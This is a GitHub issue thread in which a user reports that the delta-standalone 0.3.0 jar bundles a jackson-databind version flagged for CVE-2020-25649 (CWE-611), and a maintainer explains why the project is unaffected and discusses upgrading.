delta-io/connectors

Latest delta-standalone verion 0.3.0 has security risk CWE611

zhudaxi opened this issue · 4 comments

In latest delta-standalone version 0.3.0 jar, shadedelta/com/fasterxml/jackson/databind/ext/DOMSerializer is risky for CWE611.

This maybe due to version jackson-databind-2.10.0 has CVE-2020-25649. If upgrade to latest version this issue might be fixed.

@zhudaxi Thanks for reporting this. Since Delta Standalone doesn't use Jackson to process XML, it should not be affected. Please let us know if we misunderstand the CVE.

@zsxwing Thanks for following up. I think this issue is same as what is reported in jackson-databind project Issue. Data Standalone project is not using Jackson to process XML, but the our scanning tool report the risk. Seems not fixed yet in jackson-databind side as of now.

Thanks! I'm going to close this as it doesn't affect Delta Standalone.

@zsxwing Can we open this issue so that once this jackson-databind side issue is fixed, delta-standalone project can do upgrade to adopt the fix?
Also, jackson-databind has another security issue CVE-2020-36518, do you want to upgrade the version for delta-standalone?